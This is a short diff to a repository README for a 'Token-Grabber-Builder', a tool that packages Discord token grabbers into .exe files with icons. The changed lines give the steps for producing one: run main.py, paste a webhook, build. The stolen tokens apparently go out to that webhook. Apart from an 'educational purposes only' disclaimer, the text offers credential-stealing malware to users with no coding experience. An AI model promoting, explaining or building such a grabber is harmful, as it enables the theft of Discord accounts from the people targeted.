NightfallGT/Token-Grabber-Builder/README.md

 # Token-Grabber-Builder
 Make Discord token grabbers that are in .exe format.
 - Converts your .py file to .exe format with an icon
-- No coding experience required
+- run main.py -> paste webhook -> build

 ## About
 This tool should only be used for educational purposes only.
 Do not use this on others maliciously.